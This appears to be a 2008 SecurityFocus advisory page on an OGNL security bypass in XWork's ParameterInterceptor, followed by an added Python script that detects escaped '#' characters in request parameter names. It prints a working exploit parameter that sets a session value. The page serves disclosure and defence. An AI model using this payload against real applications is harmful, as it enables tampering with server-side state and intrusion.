XWork 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability

To exploit this issue, attackers can use readily available tools.

The following example statement is available:

To set #session.user to '0wn3d':

('\u0023' + 'session[\'user\']')(unused)=0wn3d
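A log-side check for the statement above, as an added example that is not part of the original advisory: it percent-decodes each request parameter name, resolves `\uXXXX` escapes, and reports names that contain `#` either literally or only after that decoding. The function names, the `/example.action` path and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# A backslash-u escape followed by four hex digits, e.g. \u0023 for '#'.
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Parameter name copied from the advisory's example statement.
PAGE_PAYLOAD_NAME = r"""('\u0023' + 'session[\'user\']')(unused)"""

# Constructed sample requests (not taken from real traffic).
SAMPLE_REQUESTS = [
    "/example.action?name=alice&page=2",
    "/example.action?" + quote(PAGE_PAYLOAD_NAME, safe="") + "=0wn3d",
    "/example.action?%23session.user=x",
]


def normalize(name: str) -> str:
    """Resolve \\uXXXX escapes in a parameter name to the characters they encode."""
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), name)


def suspicious_params(url: str) -> list[str]:
    """Return the percent-decoded parameter names that contain '#',
    either literally or once \\uXXXX escapes are resolved."""
    query = urlsplit(url).query
    hits = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        if "#" in normalize(name):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        found = suspicious_params(request)
        status = "FLAG" if found else "ok  "
        print(status, request, found)
```

A filter that tests only the raw name for `#` passes the second sample request, because the character is present there only in escaped form.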







 

Copyright 2008, SecurityFocus